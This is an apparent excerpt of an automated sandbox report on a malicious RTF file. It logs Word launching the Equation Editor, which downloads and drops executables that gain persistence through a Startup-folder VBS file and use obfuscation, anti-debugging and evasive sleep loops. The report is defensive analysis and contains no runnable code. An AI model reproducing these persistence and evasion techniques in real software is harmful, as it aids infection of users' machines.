Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: WC5Gv13cOQ.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\WC5Gv13cOQ.rtf
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: name.exe, 00000006.00000003.364862213.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.364383190.0000000001150000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394321762.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394032155.00000000029C0000.00000004.00001000.00020000.00000000.sdmp
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6C104 LoadLibraryA,GetProcAddress, 5_2_00D6C104
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067A461 push ecx; ret 2_2_0067A463
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00678C68 push ebx; ret 2_2_00678D23
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067AC4F push eax; ret 2_2_0067AC53
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067AC57 push eax; ret 2_2_0067AC5B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067AE5C push eax; ret 2_2_0067AE6F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067A45A push ecx; ret 2_2_0067A45B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006806F9 push ecx; ret 2_2_006806FB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00680AC1 push eax; ret 2_2_00680AC3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00678D27 push ebx; ret 2_2_00678D2B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067852A push eax; ret 2_2_00678643
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00678D31 push ebx; ret 2_2_00678D33
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0068171C push edx; ret 2_2_00681723
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006787E6 push edx; ret 2_2_006787E7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006787EE push edx; ret 2_2_006787EF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067ABE8 push eax; ret 2_2_0067ABEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006819FC push edx; ret 2_2_006822D3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067ABF0 push eax; ret 2_2_0067ABF3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0067B3FC push edx; ret 2_2_0067B6CF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006807C7 push ecx; ret 2_2_006807CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006825AA push edx; ret 2_2_006825AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006825A2 push edx; ret 2_2_006825A3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00680B90 push eax; ret 2_2_00680B93
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E20A push esi; retf 5_3_02B0E20D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E6C2 push 7E000BC3h; ret 5_3_02B0E6D1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E7F2 push cs; ret 5_3_02B0E8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E4C8 push ss; iretd 5_3_02B0E581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E596 push ss; iretd 5_3_02B0E581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E8F4 push eax; retn 000Bh 5_3_02B0E8F5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E8E4 pushfd ; retn 000Bh 5_3_02B0E8E5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E8E8 push cs; ret 5_3_02B0E8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0E900 push ds; retn 000Bh 5_3_02B0E945
Contains functionality to download and launch executables
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683F21 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683F21
Drops PE files
Source: C:\Users\user\AppData\Roaming\taskhostw.exe File created: C:\Users\user\AppData\Local\directory\name.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\taskhostw.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe Jump to dropped file

Boot Survival
barindex
Drops VBS files to the startup folder
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 7_2_0041AADB
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00CF4A35
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D753DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 5_2_00D753DF
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_01394A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_01394A35
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_014153DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_014153DF
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D13307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_00D13307
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Delayed program exit found
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040F7E2 Sleep,ExitProcess, 7_2_0040F7E2
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 5E3244
Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 133244
Contains functionality to enumerate running services
Source: C:\Windows\SysWOW64\svchost.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 7_2_0041A7D9
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 9813 Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\SysWOW64\svchost.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\directory\name.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\taskhostw.exe API coverage: 6.3 %
Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 4.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3404 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep count: 164 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep time: -492000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3656 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep count: 9813 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep time: -29439000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3776 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3940 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5449B GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00D5449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00D5C7E8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5C75D FindFirstFileW,FindClose, 5_2_00D5C75D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00D5F021
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00D5F17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F449B GetFileAttributesW,FindFirstFileW,FindClose, 6_2_013F449B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FC75D FindFirstFileW,FindClose, 6_2_013FC75D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_013FC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013FF17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013FF021
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013FF47F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013F3833
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013F3B56
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013FBD48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 7_2_0040928E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 7_2_0041C322
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 7_2_0040C388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 7_2_004096A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 7_2_00408847
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407877 FindFirstFileW,FindNextFileW, 7_2_00407877
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0044E8F9 FindFirstFileExA, 7_2_0044E8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 7_2_00419B86
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 7_2_0040BD72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10006580 FindFirstFileExA, 7_2_10006580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 7_2_00407CD2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00CF4AFE
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6401F BlockInput, 5_2_00D6401F
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00CF3B4C
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013C5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_013C5BFC
Contains functionality to dynamically determine API calls
